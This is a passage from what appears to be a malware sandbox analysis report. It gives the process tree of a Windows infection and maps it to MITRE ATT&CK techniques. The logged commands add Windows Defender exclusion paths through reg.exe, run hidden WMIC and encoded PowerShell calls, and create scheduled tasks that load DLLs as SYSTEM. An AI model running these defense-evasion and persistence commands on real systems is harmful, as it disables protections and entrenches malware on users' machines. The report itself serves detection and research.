                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2096
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1696
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:828
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1876
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2684
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1372
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2140
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1660
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2812
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2656
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1856
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2004
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1200
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2780
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2196
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2828
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:3036
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                    PID:3068
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                      PID:2680
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2280
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:2532
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:1472
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                              PID:2856
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:2152
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                  PID:1724
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
                                                                  4⤵
                                                                    PID:2252
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
                                                                    4⤵
                                                                      PID:948
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:32
                                                                      4⤵
                                                                        PID:1876
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wGkeBUkfAIhWvVVB" /t REG_DWORD /d 0 /reg:64
                                                                        4⤵
                                                                          PID:2088
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                          4⤵
                                                                            PID:1092
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                              PID:1660
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                                PID:2140
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY" /t REG_DWORD /d 0 /reg:64
                                                                                4⤵
                                                                                  PID:2664
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                                                                  4⤵
                                                                                    PID:768
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                                                                    4⤵
                                                                                      PID:1296
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 02:18:05 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\BEppgGl.exe\" XT /ERsite_idGOU 385118 /S" /V1 /F
                                                                                    3⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Creates scheduled task(s)
                                                                                    PID:2608
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
                                                                                    3⤵
                                                                                      PID:1200
                                                                                  • C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\BEppgGl.exe
                                                                                    C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\BEppgGl.exe XT /ERsite_idGOU 385118 /S
                                                                                    2⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Drops Chrome extension
                                                                                    • Drops file in System32 directory
                                                                                    • Drops file in Program Files directory
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:1756
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
                                                                                      3⤵
                                                                                        PID:1612
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                        3⤵
                                                                                          PID:2928
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                            4⤵
                                                                                              PID:1068
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                5⤵
                                                                                                  PID:2604
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                    6⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2280
                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      7⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1472
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                4⤵
                                                                                                  PID:2884
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                    5⤵
                                                                                                      PID:1976
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                        6⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1352
                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                          7⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2188
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\VKEdXN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
                                                                                                  3⤵
                                                                                                  • Drops file in Windows directory
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:3052
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\DFdbEWv.xml" /RU "SYSTEM"
                                                                                                  3⤵
                                                                                                  • Creates scheduled task(s)
                                                                                                  PID:1968
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /END /TN "qbSDwEgyNYPZlGA"
                                                                                                  3⤵
                                                                                                    PID:1132
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
                                                                                                    3⤵
                                                                                                      PID:2428
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\sdgKSdK.xml" /RU "SYSTEM"
                                                                                                      3⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:112
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\CUGkpjG.xml" /RU "SYSTEM"
                                                                                                      3⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:2744
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\LDXiXiN.xml" /RU "SYSTEM"
                                                                                                      3⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:2544
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\aiArkdJ.xml" /RU "SYSTEM"
                                                                                                      3⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:2916
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 14:11:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\NCfsxCwn\MvQmzuB.dll\",#1 /JGsite_idTkL 385118" /V1 /F
                                                                                                      3⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:1588
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /run /I /tn "QhciBzJOokLnyYZub"
                                                                                                      3⤵
                                                                                                        PID:1352
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
                                                                                                        3⤵
                                                                                                          PID:1908
                                                                                                      • C:\Windows\system32\rundll32.EXE
                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\NCfsxCwn\MvQmzuB.dll",#1 /JGsite_idTkL 385118
                                                                                                        2⤵
                                                                                                          PID:576
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\NCfsxCwn\MvQmzuB.dll",#1 /JGsite_idTkL 385118
                                                                                                            3⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in System32 directory
                                                                                                            • Enumerates system info in registry
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:3028
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
                                                                                                              4⤵
                                                                                                                PID:2120
                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                          taskeng.exe {2B0D4149-35FD-4D91-A505-6BEFFA77CECF} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
                                                                                                          1⤵
                                                                                                            PID:2480
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                              2⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1092
                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                3⤵
                                                                                                                  PID:984
                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                              1⤵
                                                                                                                PID:1540
                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe "837724645-9953604760742099-1162269840-109856445618614053915821376621307595086"
                                                                                                                1⤵
                                                                                                                  PID:2280
                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe "-1996500343-297954266969462582-1145190706-21017992512477953161192530651-996086939"
                                                                                                                  1⤵
                                                                                                                    PID:2252
                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe "613701315-1018910929833837761815105840-536294225-12647492051293378016-41962154"
                                                                                                                    1⤵
                                                                                                                      PID:1296
                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe "-2130002723-118162177-9796825942489829411222988632-1749895350-1495969317-301205498"
                                                                                                                      1⤵
                                                                                                                        PID:2928
                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe "-4343286711223936785-1139816123-72693010-687700968212638929-1945358953818171603"
                                                                                                                        1⤵
                                                                                                                          PID:2936
                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe "-14448451284285298831023474186-559865821-58841494564802272-19809543781435437599"
                                                                                                                          1⤵
                                                                                                                            PID:1000
                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe "148472458469831223-1133368797-757466805-1693788272-277821356-19119592521332596129"
                                                                                                                            1⤵
                                                                                                                              PID:1492
                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe "1066501484-134997296660094473-333205636-375640772-15009663581812185555-244411582"
                                                                                                                              1⤵
                                                                                                                                PID:2148
                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe "15997341158918258881359861050-373547342-725525536-318434931492415025-1316892610"
                                                                                                                                1⤵
                                                                                                                                  PID:2152
                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe "1880083022-1576530716-545639021201354109415235644761494179229-2799078521555264305"
                                                                                                                                  1⤵
                                                                                                                                    PID:1740
                                                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe "178861661717872321351012066021-1602907959-1785284696314117993-770220284-1444081763"
                                                                                                                                    1⤵
                                                                                                                                      PID:2604
                                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe "2022726258-1096456350-710068518-959767655-1471504873-1551449670-1902542211624573475"
                                                                                                                                      1⤵
                                                                                                                                        PID:2412
                                                                                                                                      • C:\Windows\windefender.exe
                                                                                                                                        C:\Windows\windefender.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:1904
                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                        1⤵
                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                        • Registers COM server for autorun
                                                                                                                                        • Enumerates connected drives
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:2412
                                                                                                                                        • C:\Windows\system32\MsiExec.exe
                                                                                                                                          C:\Windows\system32\MsiExec.exe -Embedding 5C0FA756C9492451DB8C852986FCECC2
                                                                                                                                          2⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:2036
                                                                                                                                        • C:\Windows\system32\MsiExec.exe
                                                                                                                                          C:\Windows\system32\MsiExec.exe -Embedding 24122281B11CDE7417BE208124B78133 M Global\MSI0000
                                                                                                                                          2⤵
                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          PID:2740
                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 3117A3717E1838C1FD11CCD42735B6BB M Global\MSI0000
                                                                                                                                          2⤵
                                                                                                                                            PID:2332
                                                                                                                                        • C:\Windows\system32\LogonUI.exe
                                                                                                                                          "LogonUI.exe" /flags:0x0
                                                                                                                                          1⤵
                                                                                                                                            PID:1648
                                                                                                                                          • C:\Windows\system32\LogonUI.exe
                                                                                                                                            "LogonUI.exe" /flags:0x1
                                                                                                                                            1⤵
                                                                                                                                              PID:2016

                                                                                                                                            Network

                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                            Reconnaissance

                                                                                                                                            Resource Development

                                                                                                                                            Initial Access

                                                                                                                                            Execution

                                                                                                                                            Command and Scripting Interpreter

                                                                                                                                            1
                                                                                                                                            T1059

                                                                                                                                            Scheduled Task/Job

                                                                                                                                            1
                                                                                                                                            T1053

                                                                                                                                            Persistence

                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                            2
                                                                                                                                            T1547

                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                            2
                                                                                                                                            T1547.001

                                                                                                                                            Create or Modify System Process

                                                                                                                                            2
                                                                                                                                            T1543

                                                                                                                                            Windows Service

                                                                                                                                            2
                                                                                                                                            T1543.003

                                                                                                                                            Scheduled Task/Job

                                                                                                                                            1
                                                                                                                                            T1053

                                                                                                                                            Privilege Escalation

                                                                                                                                            Abuse Elevation Control Mechanism

                                                                                                                                            1
                                                                                                                                            T1548

                                                                                                                                            Bypass User Account Control

                                                                                                                                            1
                                                                                                                                            T1548.002

                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                            2
                                                                                                                                            T1547

                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                            2
                                                                                                                                            T1547.001

                                                                                                                                            Create or Modify System Process

                                                                                                                                            2
                                                                                                                                            T1543

                                                                                                                                            Windows Service

                                                                                                                                            2
                                                                                                                                            T1543.003

                                                                                                                                            Scheduled Task/Job

                                                                                                                                            1
                                                                                                                                            T1053

                                                                                                                                            Defense Evasion

                                                                                                                                            Abuse Elevation Control Mechanism

                                                                                                                                            1
                                                                                                                                            T1548

                                                                                                                                            Bypass User Account Control

                                                                                                                                            1
                                                                                                                                            T1548.002

                                                                                                                                            Impair Defenses

                                                                                                                                            5
                                                                                                                                            T1562

                                                                                                                                            Disable or Modify System Firewall

                                                                                                                                            1
                                                                                                                                            T1562.004

                                                                                                                                            Disable or Modify Tools

                                                                                                                                            3
                                                                                                                                            T1562.001

                                                                                                                                            Modify Registry

                                                                                                                                            7
                                                                                                                                            T1112

                                                                                                                                            Subvert Trust Controls

                                                                                                                                            1
                                                                                                                                            T1553

                                                                                                                                            Install Root Certificate

                                                                                                                                            1
                                                                                                                                            T1553.004

                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                            1
                                                                                                                                            T1497

                                                                                                                                            Credential Access

                                                                                                                                            Unsecured Credentials

                                                                                                                                            2
                                                                                                                                            T1552

                                                                                                                                            Credentials In Files

                                                                                                                                            2
                                                                                                                                            T1552.001

                                                                                                                                            Discovery

                                                                                                                                            Peripheral Device Discovery

                                                                                                                                            2
                                                                                                                                            T1120

                                                                                                                                            Query Registry

                                                                                                                                            8
                                                                                                                                            T1012

                                                                                                                                            System Information Discovery

                                                                                                                                            8
                                                                                                                                            T1082

                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                            1
                                                                                                                                            T1497

                                                                                                                                            Lateral Movement

                                                                                                                                            Collection

                                                                                                                                            Data from Local System

                                                                                                                                            2
                                                                                                                                            T1005

                                                                                                                                            Command and Control

                                                                                                                                            Web Service

                                                                                                                                            1
                                                                                                                                            T1102

                                                                                                                                            Exfiltration

                                                                                                                                            Impact

                                                                                                                                            Replay Monitor

                                                                                                                                            Loading Replay Monitor...

                                                                                                                                            Downloads

                                                                                                                                            • C:\Config.Msi\f77ee0b.rbs
                                                                                                                                              Filesize

